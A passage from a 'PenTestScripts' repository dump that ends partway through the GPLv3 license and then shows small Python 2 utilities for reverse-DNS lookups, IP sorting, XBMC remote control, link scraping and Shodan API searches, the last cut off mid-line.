it is 286 | available for as long as needed to satisfy these requirements. 287 | 288 | e) Convey the object code using peer-to-peer transmission, provided 289 | you inform other peers where the object code and Corresponding 290 | Source of the work are being offered to the general public at no 291 | charge under subsection 6d. 292 | 293 | A separable portion of the object code, whose source code is excluded 294 | from the Corresponding Source as a System Library, need not be 295 | included in conveying the object code work. 296 | 297 | A "User Product" is either (1) a "consumer product", which means any 298 | tangible personal property which is normally used for personal, family, 299 | or household purposes, or (2) anything designed or sold for incorporation 300 | into a dwelling. In determining whether a product is a consumer product, 301 | doubtful cases shall be resolved in favor of coverage. For a particular 302 | product received by a particular user, "normally used" refers to a 303 | typical or common use of that class of product, regardless of the status 304 | of the particular user or of the way in which the particular user 305 | actually uses, or expects or is expected to use, the product. A product 306 | is a consumer product regardless of whether the product has substantial 307 | commercial, industrial or non-consumer uses, unless such uses represent 308 | the only significant mode of use of the product. 309 | 310 | "Installation Information" for a User Product means any methods, 311 | procedures, authorization keys, or other information required to install 312 | and execute modified versions of a covered work in that User Product from 313 | a modified version of its Corresponding Source. The information must 314 | suffice to ensure that the continued functioning of the modified object 315 | code is in no case prevented or interfered with solely because 316 | modification has been made. 317 | 318 | If you convey an object code work under this section in, or with, or 319 | specifically for use in, a User Product, and the conveying occurs as 320 | part of a transaction in which the right of possession and use of the 321 | User Product is transferred to the recipient in perpetuity or for a 322 | fixed term (regardless of how the transaction is characterized), the 323 | Corresponding Source conveyed under this section must be accompanied 324 | by the Installation Information. But this requirement does not apply 325 | if neither you nor any third party retains the ability to install 326 | modified object code on the User Product (for example, the work has 327 | been installed in ROM). 328 | 329 | The requirement to provide Installation Information does not include a 330 | requirement to continue to provide support service, warranty, or updates 331 | for a work that has been modified or installed by the recipient, or for 332 | the User Product in which it has been modified or installed. Access to a 333 | network may be denied when the modification itself materially and 334 | adversely affects the operation of the network or violates the rules and 335 | protocols for communication across the network. 336 | 337 | Corresponding Source conveyed, and Installation Information provided, 338 | in accord with this section must be in a format that is publicly 339 | documented (and with an implementation available to the public in 340 | source code form), and must require no special password or key for 341 | unpacking, reading or copying. 342 | 343 | 7. Additional Terms. 344 | 345 | "Additional permissions" are terms that supplement the terms of this 346 | License by making exceptions from one or more of its conditions. 347 | Additional permissions that are applicable to the entire Program shall 348 | be treated as though they were included in this License, to the extent 349 | that they are valid under applicable law. If additional permissions 350 | apply only to part of the Program, that part may be used separately 351 | under those permissions, but the entire Program remains governed by 352 | this License without regard to the additional permissions. 353 | 354 | When you convey a copy of a covered work, you may at your option 355 | remove any additional permissions from that copy, or from any part of 356 | it. (Additional permissions may be written to require their own 357 | removal in certain cases when you modify the work.) You may place 358 | additional permissions on material, added by you to a covered work, 359 | for which you have or can give appropriate copyright permission. 360 | 361 | Notwithstanding any other provision of this License, for material you 362 | add to a covered work, you may (if authorized by the copyright holders of 363 | that material) supplement the terms of this License with terms: 364 | 365 | a) Disclaiming warranty or limiting liability differently from the 366 | terms of sections 15 and 16 of this License; or 367 | 368 | b) Requiring preservation of specified reasonable legal notices or 369 | author attributions in that material or in the Appropriate Legal 370 | Notices displayed by works containing it; or 371 | 372 | c) Prohibiting misrepresentation of the origin of that material, or 373 | requiring that modified versions of such material be marked in 374 | reasonable ways as different from the original version; or 375 | 376 | d) Limiting the use for publicity purposes of names of licensors or 377 | authors of the material; or 378 | 379 | e) Declining to grant rights under trademark law for use of some 380 | trade names, trademarks, or service marks; or 381 | 382 | f) Requiring indemnification of licensors and authors of that 383 | material by anyone who conveys the material (or modified versions of 384 | it) with contractual assumptions of liability to the recipient, for 385 | any liability that these contractual assumptions directly impose on 386 | those licensors and authors. 387 | 388 | All other non-permissive additional terms are considered "further 389 | restrictions" within the meaning of section 10. If the Program as you 390 | received it, or any part of it, contains a notice stating that it is 391 | governed by this License along with a term that is a further 392 | restriction, you may remove that term. If a license document contains 393 | a further restriction but permits relicensing or conveying under this 394 | License, you may add to a covered work material governed by the terms 395 | of that license document, provided that the further restriction does 396 | not survive such relicensing or conveying. 397 | 398 | If you add terms to a covered work in accord with this section, you 399 | must place, in the relevant source files, a statement of the 400 | additional terms that apply to those files, or a notice indicating 401 | where to find the applicable terms. 402 | 403 | Additional terms, permissive or non-permissive, may be stated in the 404 | form of a separately written license, or stated as exceptions; 405 | the above requirements apply either way. 406 | 407 | 8. Termination. 408 | 409 | You may not propagate or modify a covered work except as expressly 410 | provided under this License. Any attempt otherwise to propagate or 411 | modify it is void, and will automatically terminate your rights under 412 | this License (including any patent licenses granted under the third 413 | paragraph of section 11). 414 | 415 | However, if you cease all violation of this License, then your 416 | license from a particular copyright holder is reinstated (a) 417 | provisionally, unless and until the copyright holder explicitly and 418 | finally terminates your license, and (b) permanently, if the copyright 419 | holder fails to notify you of the violation by some reasonable means 420 | prior to 60 days after the cessation. 421 | 422 | Moreover, your license from a particular copyright holder is 423 | reinstated permanently if the copyright holder notifies you of the 424 | violation by some reasonable means, this is the first time you have 425 | received notice of violation of this License (for any work) from that 426 | copyright holder, and you cure the violation prior to 30 days after 427 | your receipt of the notice. 428 | 429 | Termination of your rights under this section does not terminate the 430 | licenses of parties who have received copies or rights from you under 431 | this License. If your rights have been terminated and not permanently 432 | reinstated, you do not qualify to receive new licenses for the same 433 | material under section 10. 434 | 435 | 9. Acceptance Not Required for Having Copies. 436 | 437 | You are not required to accept this License in order to receive or 438 | run a copy of the Program. Ancillary propagation of a covered work 439 | occurring solely as a consequence of using peer-to-peer transmission 440 | to receive a copy likewise does not require acceptance. However, 441 | nothing other than this License grants you permission to propagate or 442 | modify any covered work. These actions infringe copyright if you do 443 | not accept this License. Therefore, by modifying or propagating a 444 | covered work, you indicate your acceptance of this License to do so. 445 | 446 | 10. Automatic Licensing of Downstream Recipients. 447 | 448 | Each time you convey a covered work, the recipient automatically 449 | receives a license from the original licensors, to run, modify and 450 | propagate that work, subject to this License. You are not responsible 451 | for enforcing compliance by third parties with this License. 452 | 453 | An "entity transaction" is a transaction transferring control of an 454 | organization, or substantially all assets of one, or subdividing an 455 | organization, or merging organizations. If propagation of a covered 456 | work results from an entity transaction, each party to that 457 | transaction who receives a copy of the work also receives whatever 458 | licenses to the work the party's predecessor in interest had or could 459 | give under the previous paragraph, plus a right to possession of the 460 | Corresponding Source of the work from the predecessor in interest, if 461 | the predecessor has it or can get it with reasonable efforts. 462 | 463 | You may not impose any further restrictions on the exercise of the 464 | rights granted or affirmed under this License. For example, you may 465 | not impose a license fee, royalty, or other charge for exercise of 466 | rights granted under this License, and you may not initiate litigation 467 | (including a cross-claim or counterclaim in a lawsuit) alleging that 468 | any patent claim is infringed by making, using, selling, offering for 469 | sale, or importing the Program or any portion of it. 470 | 471 | 11. Patents. 472 | 473 | A "contributor" is a copyright holder who authorizes use under this 474 | License of the Program or a work on which the Program is based. The 475 | work thus licensed is called the contributor's "contributor version". 476 | 477 | A contributor's "essential patent claims" are all patent claims 478 | owned or controlled by the contributor, whether already acquired or 479 | hereafter acquired, that would be infringed by some manner, permitted 480 | by this License, of making, using, or selling its contributor version, 481 | but do not include claims that would be infringed only as a 482 | consequence of further modification of the contributor version. For 483 | purposes of this definition, "control" includes the right to grant 484 | patent sublicenses in a manner consistent with the requirements of 485 | this License. 486 | 487 | Each contributor grants you a non-exclusive, worldwide, royalty-free 488 | patent license under the contributor's essential patent claims, to 489 | make, use, sell, offer for sale, import and otherwise run, modify and 490 | propagate the contents of its contributor version. 491 | 492 | In the following three paragraphs, a "patent license" is any express 493 | agreement or commitment, however denominated, not to enforce a patent 494 | (such as an express permission to practice a patent or covenant not to 495 | sue for patent infringement). To "grant" such a patent license to a 496 | party means to make such an agreement or commitment not to enforce a 497 | patent against the party. 498 | 499 | If you convey a covered work, knowingly relying on a patent license, 500 | and the Corresponding Source of the work is not available for anyone 501 | to copy, free of charge and under the terms of this License, through a 502 | publicly available network server or other readily accessible means, 503 | then you must either (1) cause the Corresponding Source to be so 504 | available, or (2) arrange to deprive yourself of the benefit of the 505 | patent license for this particular work, or (3) arrange, in a manner 506 | consistent with the requirements of this License, to extend the patent 507 | license to downstream recipients. "Knowingly relying" means you have 508 | actual knowledge that, but for the patent license, your conveying the 509 | covered work in a country, or your recipient's use of the covered work 510 | in a country, would infringe one or more identifiable patents in that 511 | country that you have reason to believe are valid. 512 | 513 | If, pursuant to or in connection with a single transaction or 514 | arrangement, you convey, or propagate by procuring conveyance of, a 515 | covered work, and grant a patent license to some of the parties 516 | receiving the covered work authorizing them to use, propagate, modify 517 | or convey a specific copy of the covered work, then the patent license 518 | you grant is automatically extended to all recipients of the covered 519 | work and works based on it. 520 | 521 | A patent license is "discriminatory" if it does not include within 522 | the scope of its coverage, prohibits the exercise of, or is 523 | conditioned on the non-exercise of one or more of the rights that are 524 | specifically granted under this License. You may not convey a covered 525 | work if you are a party to an arrangement with a third party that is 526 | in the business of distributing software, under which you make payment 527 | to the third party based on the extent of your activity of conveying 528 | the work, and under which the third party grants, to any of the 529 | parties who would receive the covered work from you, a discriminatory 530 | patent license (a) in connection with copies of the covered work 531 | conveyed by you (or copies made from those copies), or (b) primarily 532 | for and in connection with specific products or compilations that 533 | contain the covered work, unless you entered into that arrangement, 534 | or that patent license was granted, prior to 28 March 2007. 535 | 536 | Nothing in this License shall be construed as excluding or limiting 537 | any implied license or other defenses to infringement that may 538 | otherwise be available to you under applicable patent law. 539 | 540 | 12. No Surrender of Others' Freedom. 541 | 542 | If conditions are imposed on you (whether by court order, agreement or 543 | otherwise) that contradict the conditions of this License, they do not 544 | excuse you from the conditions of this License. If you cannot convey a 545 | covered work so as to satisfy simultaneously your obligations under this 546 | License and any other pertinent obligations, then as a consequence you may 547 | not convey it at all. For example, if you agree to terms that obligate you 548 | to collect a royalty for further conveying from those to whom you convey 549 | the Program, the only way you could satisfy both those terms and this 550 | License would be to refrain entirely from conveying the Program. 551 | 552 | 13. Use with the GNU Affero General Public License. 553 | 554 | Notwithstanding any other provision of this License, you have 555 | permission to link or combine any covered work with a work licensed 556 | under version 3 of the GNU Affero General Public License into a single 557 | combined work, and to convey the resulting work. The terms of this 558 | License will continue to apply to the part which is the covered work, 559 | but the special requirements of the GNU Affero General Public License, 560 | section 13, concerning interaction through a network will apply to the 561 | combination as such. 562 | 563 | 14. Revised Versions of this License. 564 | 565 | The Free Software Foundation may publish revised and/or new versions of 566 | the GNU General Public License from time to time. Such new versions will 567 | be similar in spirit to the present version, but may differ in detail to 568 | address new problems or concerns. 569 | 570 | Each version is given a distinguishing version number. If the 571 | Program specifies that a certain numbered version of the GNU General 572 | Public License "or any later version" applies to it, you have the 573 | option of following the terms and conditions either of that numbered 574 | version or of any later version published by the Free Software 575 | Foundation. If the Program does not specify a version number of the 576 | GNU General Public License, you may choose any version ever published 577 | by the Free Software Foundation. 578 | 579 | If the Program specifies that a proxy can decide which future 580 | versions of the GNU General Public License can be used, that proxy's 581 | public statement of acceptance of a version permanently authorizes you 582 | to choose that version for the Program. 583 | 584 | Later license versions may give you additional or different 585 | permissions. However, no additional obligations are imposed on any 586 | author or copyright holder as a result of your choosing to follow a 587 | later version. 588 | 589 | 15. Disclaimer of Warranty. 590 | 591 | THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY 592 | APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT 593 | HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY 594 | OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, 595 | THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR 596 | PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM 597 | IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF 598 | ALL NECESSARY SERVICING, REPAIR OR CORRECTION. 599 | 600 | 16. Limitation of Liability. 601 | 602 | IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING 603 | WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS 604 | THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY 605 | GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE 606 | USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF 607 | DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD 608 | PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS), 609 | EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF 610 | SUCH DAMAGES. 611 | 612 | 17. Interpretation of Sections 15 and 16. 613 | 614 | If the disclaimer of warranty and limitation of liability provided 615 | above cannot be given local legal effect according to their terms, 616 | reviewing courts shall apply local law that most closely approximates 617 | an absolute waiver of all civil liability in connection with the 618 | Program, unless a warranty or assumption of liability accompanies a 619 | copy of the Program in return for a fee. 620 | 621 | END OF TERMS AND CONDITIONS 622 | 623 | How to Apply These Terms to Your New Programs 624 | 625 | If you develop a new program, and you want it to be of the greatest 626 | possible use to the public, the best way to achieve this is to make it 627 | free software which everyone can redistribute and change under these terms. 628 | 629 | To do so, attach the following notices to the program. It is safest 630 | to attach them to the start of each source file to most effectively 631 | state the exclusion of warranty; and each file should have at least 632 | the "copyright" line and a pointer to where the full notice is found. 633 | 634 | {one line to give the program's name and a brief idea of what it does.} 635 | Copyright (C) {year} {name of author} 636 | 637 | This program is free software: you can redistribute it and/or modify 638 | it under the terms of the GNU General Public License as published by 639 | the Free Software Foundation, either version 3 of the License, or 640 | (at your option) any later version. 641 | 642 | This program is distributed in the hope that it will be useful, 643 | but WITHOUT ANY WARRANTY; without even the implied warranty of 644 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 645 | GNU General Public License for more details. 646 | 647 | You should have received a copy of the GNU General Public License 648 | along with this program. If not, see {http://www.gnu.org/licenses/}. 649 | 650 | Also add information on how to contact you by electronic and paper mail. 651 | 652 | If the program does terminal interaction, make it output a short 653 | notice like this when it starts in an interactive mode: 654 | 655 | PenTestScripts Copyright (C) 2013 ChrisTruncer 656 | This program comes with ABSOLUTELY NO WARRANTY; for details type `show w'. 657 | This is free software, and you are welcome to redistribute it 658 | under certain conditions; type `show c' for details. 659 | 660 | The hypothetical commands `show w' and `show c' should show the appropriate 661 | parts of the General Public License. Of course, your program's commands 662 | might be different; for a GUI interface, you would use an "about box". 663 | 664 | You should also get your employer (if you work as a programmer) or school, 665 | if any, to sign a "copyright disclaimer" for the program, if necessary. 666 | For more information on this, and how to apply and follow the GNU GPL, see 667 | {http://www.gnu.org/licenses/}. 668 | 669 | The GNU General Public License does not permit incorporating your program 670 | into proprietary programs. If your program is a subroutine library, you 671 | may consider it more useful to permit linking proprietary applications with 672 | the library. If this is what you want to do, use the GNU Lesser General 673 | Public License instead of this License. But first, please read 674 | {http://www.gnu.org/philosophy/why-not-lgpl.html}. 675 | -------------------------------------------------------------------------------- /NetworkScripts/DNSReverser.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | # Quick script that attempts to find the reverse DNS info 4 | # from a provided IP range. 5 | 6 | import argparse 7 | import os 8 | import socket 9 | import sys 10 | from netaddr import IPNetwork 11 | 12 | 13 | def cli_parser(): 14 | 15 | # Command line argument parser 16 | parser = argparse.ArgumentParser( 17 | add_help=False, 18 | description="DNSReverser takes IP addresses and tries to find its hostname.") 19 | parser.add_argument( 20 | "-f", metavar="ips.txt", default=None, 21 | help="File containing IPs to resolve hostnames for.") 22 | parser.add_argument( 23 | "-ip", metavar='192.168.1.1', default=None, 24 | help="Used to find hostname about a specific IP.") 25 | parser.add_argument( 26 | "-cidr", metavar='192.168.1.0/24', default=None, 27 | help="Used to find hostnames about a specific CIDR range.") 28 | parser.add_argument( 29 | '-h', '-?', '--h', '-help', '--help', action="store_true", 30 | help=argparse.SUPPRESS) 31 | args = parser.parse_args() 32 | 33 | if args.h: 34 | parser.print_help() 35 | sys.exit() 36 | 37 | return args.f, args.ip, args.cidr 38 | 39 | 40 | def rdns_lookup(ip_address): 41 | 42 | try: 43 | # Get the reverse dns name if it exists 44 | reverse_dns = socket.gethostbyaddr(ip_address)[0] 45 | script_out = ip_address.strip() + ' ' + reverse_dns + '\n' 46 | with open('reverse_dns_results.txt', 'a') as rev_results: 47 | rev_results.write(script_out) 48 | except: 49 | print "No Reverse DNS for " + str(ip_address) + "." 50 | 51 | return 52 | 53 | 54 | def cidr_net(cidr_range): 55 | net_1 = IPNetwork(cidr_range) 56 | 57 | return net_1 58 | 59 | 60 | def file_read(input_file): 61 | with open(input_file, 'r') as f: 62 | ip_file = f.readlines() 63 | 64 | return ip_file 65 | 66 | 67 | def title(): 68 | # Clear the screen 69 | os.system('clear') 70 | 71 | print "############################################################" 72 | print "# Reverse DNS Scanner #" 73 | print "############################################################\n" 74 | print "Starting Reverse DNS Scan...\n" 75 | 76 | return 77 | 78 | 79 | if __name__ == '__main__': 80 | 81 | # Parse command line options 82 | cli_file, cli_ip, cli_cidr = cli_parser() 83 | 84 | title() 85 | 86 | if cli_cidr is not None and cli_file is None and cli_ip is None: 87 | ip_cidr_list = cidr_net(cli_cidr) 88 | for ip_add in ip_cidr_list: 89 | ip_add = str(ip_add) 90 | ip_add = ip_add.strip() 91 | rdns_lookup(ip_add) 92 | 93 | elif cli_file is not None and cli_cidr is None and cli_ip is None: 94 | ip_file_input = file_read(cli_file) 95 | for ip_add_file in ip_file_input: 96 | ip_add_file = ip_add_file.strip() 97 | rdns_lookup(ip_add_file) 98 | 99 | elif cli_ip is not None and cli_cidr is None and cli_file is None: 100 | rdns_lookup(cli_ip) 101 | 102 | else: 103 | print "[*]ERROR: Please start over and provide a valid input option." 104 | sys.exit() 105 | 106 | print "\nScan Completed! Check the output file!\n" 107 | -------------------------------------------------------------------------------- /NetworkScripts/IPSorter.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # IP sort and uniquing script by @ChrisTruncer 3 | 4 | import os 5 | import sys 6 | 7 | try: 8 | # Take filename as first argument 9 | ip_file = sys.argv[1] 10 | except IndexError: 11 | # Clear the console 12 | os.system('clear') 13 | print "#####################################################################" 14 | print "# IP Sorter #" 15 | print "#####################################################################\n" 16 | print "[*] ERROR: Please provide a file containing IPs to be uniqued \ 17 | and sorted!\n".replace(' ', '') 18 | print "Example: ./IPSorter.py ips.txt" 19 | sys.exit() 20 | 21 | # Read in all IPs from user specified file 22 | with open(ip_file, 'r') as open_file: 23 | ips = open_file.readlines() 24 | 25 | # Convert to a set to remove duplicates, then convert to list 26 | ips = list(set(ips)) 27 | 28 | # This came from http://www.secnetix.de/olli/Python/tricks.hawk#sortips 29 | for i in range(len(ips)): 30 | ips[i] = "%3s.%3s.%3s.%3s" % tuple(ips[i].split(".")) 31 | 32 | # Use built in sort method 33 | ips.sort() 34 | 35 | # Replace all the spaces in our list 36 | for i in range(len(ips)): 37 | ips[i] = ips[i].replace(" ", "") 38 | print ips[i].strip() 39 | -------------------------------------------------------------------------------- /NetworkScripts/xbmc.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | # This script implements basic controls for a Boxee xbmc device 4 | # Play both pauses and plays a video. 5 | # Everything else should be straightforward 6 | 7 | import argparse 8 | import sys 9 | import urllib2 10 | 11 | 12 | def cli_parser(): 13 | 14 | # Command line argument parser 15 | parser = argparse.ArgumentParser( 16 | add_help=False, 17 | description="Boxee_Control is a script that lets you control Boxee and XBMC devides. Supported commands are Play/Pause, OK/Enter, Stop, Left, Right, Down, Up.") 18 | parser.add_argument( 19 | "--ip", metavar='192.168.199.23', 20 | help="IP address of boxee/xbmc device.") 21 | parser.add_argument( 22 | "--port", metavar='8800', default='8800', 23 | help="Specify port value, default is 8800.") 24 | parser.add_argument( 25 | "--command", '-c', metavar="Play", 26 | help="Command to issue. Supported Commands: Play, Pause, Stop, Left, Right, Down, Up, Ok, Enter, Rewind, Fastforward.") 27 | parser.add_argument( 28 | '-h', '-?', '--h', '-help', '--help', action="store_true", 29 | help=argparse.SUPPRESS) 30 | args = parser.parse_args() 31 | 32 | if args.h: 33 | parser.print_help() 34 | sys.exit() 35 | 36 | return args 37 | 38 | if __name__ == '__main__': 39 | 40 | # Begin parsing command line options 41 | cli_args = cli_parser() 42 | 43 | xbmc_system = "http://" + cli_args.ip + ":" + cli_args.port 44 | 45 | if cli_args.command.lower().strip() == "play" or cli_args.command.lower().strip() == "pause": 46 | xbmc_command = '/xbmcCmds/xbmcHttp?command=Pause()' 47 | elif cli_args.command.lower() == "stop": 48 | xbmc_command = '/xbmcCmds/xbmcHttp?command=Stop()' 49 | elif cli_args.command.lower() == "ok" or cli_args.command.lower() == "enter": 50 | xbmc_command = '/xbmcCmds/xbmcHttp?command=SendKey(0XF00D)' 51 | elif cli_args.command.lower() == "right": 52 | xbmc_command = '/xbmcCmds/xbmcHttp?command=SendKey(0XF027)' 53 | elif cli_args.command.lower() == "left": 54 | xbmc_command = '/xbmcCmds/xbmcHttp?command=SendKey(0XF025)' 55 | elif cli_args.command.lower() == "down": 56 | xbmc_command = '/xbmcCmds/xbmcHttp?command=SendKey(0XF028)' 57 | elif cli_args.command.lower() == "up": 58 | xbmc_command = '/xbmcCmds/xbmcHttp?command=SendKey(0XF026)' 59 | elif cli_args.command.lower() == "rewind": 60 | xbmc_command = '/xbmcCmds/xbmcHttp?command=Action(78)' 61 | elif cli_args.command.lower() == "fastforward": 62 | xbmc_command = '/xbmcCmds/xbmcHttp?command=Action(77)' 63 | else: 64 | print "You didn't specify a supported command. Please only use:" 65 | print "play, pause, ok, enter, up, down, left, right, rewind, or fastworward" 66 | sys.exit() 67 | 68 | full_url = xbmc_system + xbmc_command 69 | 70 | # Send the command 71 | urllib2.urlopen(full_url) 72 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | PenTestScripts 2 | ============== 3 | 4 | Scripts that are useful for me on pen tests 5 | -------------------------------------------------------------------------------- /WebScripts/LinkFinder.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | import httplib2 4 | from BeautifulSoup import BeautifulSoup, SoupStrainer 5 | 6 | http = httplib2.Http() 7 | status, response = http.request('http://www.christophertruncer.com') 8 | 9 | for link in BeautifulSoup(response, parseOnlyThese=SoupStrainer('a')): 10 | if link.has_key('href'): 11 | print link['href'] 12 | -------------------------------------------------------------------------------- /WebScripts/ShodanSearch.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | # Script for interacting with Shodan's API and searching it. 4 | 5 | # In case you get an import error for netaddr or shodan, run: 6 | # apt-get install python-shodan python-netaddr 7 | 8 | import argparse 9 | from netaddr import IPNetwork 10 | import os 11 | import re 12 | import shodan 13 | import sys 14 | 15 | 16 | def cli_parser(): 17 | 18 | # Command line argument parser 19 | parser = argparse.ArgumentParser( 20 | add_help=False, 21 | description="ShodanSearch is a tool for searching shodan via its API.") 22 | parser.add_argument( 23 | "-search", metavar="Apache server", default=False, 24 | help="Use this when searching Shodan for a string.") 25 | parser.add_argument( 26 | "-f", metavar="ips.txt", default=None, 27 | help="File containing IPs to search shodan for.") 28 | parser.add_argument( 29 | "-ip", metavar='192.168.1.1', default=False, 30 | help="Used to return results from Shodan about a specific IP.") 31 | parser.add_argument( 32 | "-cidr", metavar='192.168.1.0/24', default=False, 33 | help="Used to return results from Shodan about a specific CIDR range.") 34 | parser.add_argument( 35 | "--hostnameonly", action='store_true', 36 | help="[Optional] Only provide results with a Shodan stored hostname.") 37 | parser.add_argument( 38 | "--page", metavar='1', default=1, 39 | help="Page number of results to return (default 1 (first page)).") 40 | parser.add_argument( 41 | '-h', '-?', '--h', '-help', '--help', action="store_true", 42 | help=argparse.SUPPRESS) 43 | args = parser.parse_args() 44 | 45 | if args.h: 46 | parser.print_help() 47 | sys.exit() 48 | 49 | return args.search, args.ip, args.cidr, args.hostnameonly, args.page, args.f 50 | 51 | 52 | def create_shodan_object(): 53 | # Add your shodan API key here 54 | api_key = "TYPEAPIKEYHERE" 55 | 56 | shodan_object = shodan.WebAPI(api_key) 57 | 58 | return shodan_object 59 | 60 | 61 | def shodan_cidr_search(shodan_search_object, shodan_search_cidr, input_file_ips): 62 | 63 | title() 64 | 65 | if shodan_search_cidr is not False: 66 | 67 | if not validate_cidr(shodan_search_cidr): 68 | print "[*] ERROR: Please provide valid CIDR notation!" 69 | sys.exit() 70 | 71 | else: 72 | 73 | print "[*] Searching Shodan for info about " + shodan_search_cidr 74 | 75 | # Create cidr notated list 76 | network = IPNetwork(shodan_search_cidr) 77 | 78 | elif input_file_ips is not False: 79 | try: 80 | with open(input_file_ips, 'r') as ips_provided: 81 | network = ips_provided.readlines() 82 | except IOError: 83 | print "[*] ERROR: You didn't provide a valid input file." 84 | print "[*] ERROR: Please re-run and provide a valid file." 85 | sys.exit() 86 | 87 | # search shodan for each IP 88 | for ip in network: 89 | 90 | print "\n[*] Searching specifically for: " + str(ip) 91 | 92 | try: 93 | # Search Shodan 94 | result = shodan_search_object.host(ip) 95 | 96 | # Display basic info of result 97 | print "\n*** RESULT ***" 98 | print "IP: " + result['ip'] 99 | print "Country: " + result['country_name'] 100 | if result['city'] is not None: 101 | print "City: " + result['city'] 102 | print "\n" 103 | 104 | # Loop through other info 105 | for item in result['data']: 106 | print "Port: " + str(item['port']) 107 | print "Banner: " + item['banner'] 108 | 109 | except Exception, e: 110 | if str(e).strip() == "API access denied": 111 | print "You provided an invalid API Key!" 112 | print "Please provide a valid API Key and re-run!" 113 | sys.exit() 114 | elif str(e).strip() == "No information available for that IP.": 115 | print "No information is available for " + str(ip) 116 | else: 117 | print "[*]Unknown Error: " + str(e) 118 | 119 | 120 | def shodan_ip_search(shodan_search_object, shodan_search_ip): 121 | 122 | title() 123 | 124 | if validate_ip(shodan_search_ip): 125 | 126 | print "[*] Searching Shodan for info about " + shodan_search_ip + "..." 127 | 128 | try: 129 | # Search Shodan 130 | result = shodan_search_object.host(shodan_search_ip) 131 | 132 | # Display basic info of result 133 | print "\n*** RESULT ***" 134 | print "IP: " + result['ip'] 135 | print "Country: " + result['country_name'] 136 | if result['city'] is not None: 137 | print "City: " + result['city'] 138 | print "\n" 139 | 140 | # Loop through other info 141 | for item in result['data']: 142 | print "Port: " + str(item['port']) 143 | print "Banner: " + item['banner'] 144 | 145 | except Exception, e: 146 | if str(e).strip() == "API access denied": 147 | print "You provided an invalid API Key!" 148 | print "Please provide a valid API Key and re-run!" 149 | sys.exit() 150 | elif str(e).strip() == "No information available for that IP.": 151 | print "No information on Shodan about " +\ 152 | str(shodan_search_ip) 153 | else: 154 | print "[*]Unknown Error: " + str(e) 155 | 156 | else: 157 | print "[*]ERROR: You provided an invalid IP address!" 158 | print "[*]ERROR: Please re-run and provide a valid IP." 159 | sys.exit() 160 | 161 | 162 | def shodan_string_search(shodan_search_object, shodan_search_string, 163 | hostname_only, page_to_return): 164 | 165 | title() 166 | 167 | # Try/catch for searching the shodan api 168 | print "[*] Searching Shodan...\n" 169 | 170 | try: 171 | # Time to search Shodan 172 | results = shodan_search_object.search( 173 | shodan_search_string, page=page_to_return) 174 | 175 | if not hostname_only: 176 | print "Total number of results back: " +\ 177 | str(results['total']) + "\n" 178 | 179 | for result in results['matches']: 180 | if hostname_only: 181 | for item in result['hostnames']: 182 | if item is None: 183 | pass 184 | else: 185 | print "*** RESULT ***" 186 | print "IP Address: " + result['ip'] 187 | if result['country_name'] is not None: 188 | print "Country: " + result['country_name'] 189 | if result['updated'] is not None: 190 | print "Last updated: " + result['updated'] 191 | if result['port'] is not None: 192 | print "Port: " + str(result['port']) 193 | print "Data: " + result['data'] 194 | for item in result['hostnames']: 195 | print "Hostname: " + item 196 | print 197 | else: 198 | print "*** RESULT ***" 199 | print "IP Address: " + result['ip'] 200 | if result['country_name'] is not None: 201 | print "Country: " + result['country_name'] 202 | if result['updated'] is not None: 203 | print "Last updated: " + result['updated'] 204 | if result['port'] is not None: 205 | print "Port: " + str(result['port']) 206 | print "Data: " + result['data'] 207 | for item in result['hostnames']: 208 | print "Hostname: " + item 209 | print 210 | 211 | except Exception, e: 212 | if str(e).strip() == "API access denied": 213 | print "You provided an invalid API Key!" 214 | print "Please provide a valid API Key and re-run!" 215 | sys.exit() 216 | 217 | 218 | def title(): 219 | os.system('clear') 220 | print "##################################################################" 221 | print "# Shodan Search #" 222 | print "##################################################################\n" 223 | 224 | return 225 | 226 | 227 | def validate_cidr(val_cidr): 228 | # This came from (Mult-line link for pep8 compliance) 229 | # http://python-iptools.googlecode.com/svn-history/r4 230 | # /trunk/iptools/__init__.py 231 | cidr_re = re.compile(r'^(\d{1,3}\.){0,3}\d{1,3}/\d{1,2}$') 232 | if cidr_re.match(val_cidr): 233 | ip, mask = val_cidr.split('/') 234 | if validate_ip(ip): 235 | if int(mask) > 32: 236 | return False 237 | else: 238 | return False 239 | return True 240 | return False 241 | 242 | 243 | def validate_ip(val_ip): 244 | # This came from (Mult-line link for pep8 compliance) 245 | # http://python-iptools.googlecode.com/svn-history/r4 246 | # /trunk/iptools/__init__.py 247 | ip_re = re.compile(r'^(\d{1,3}\.){0,3}\d{1,3}$') 248 | if ip_re.match(val_ip): 249 | quads = (int(q) for q in val_ip.split('.')) 250 | for q in quads: 251 | if q > 255: 252 | return False 253 | return True 254 | return False 255 | 256 | 257 | if __name__ == '__main__': 258 | 259 | # Parse command line options 260 | search_string, search_ip, search_cidr, search_hostnameonly,\ 261 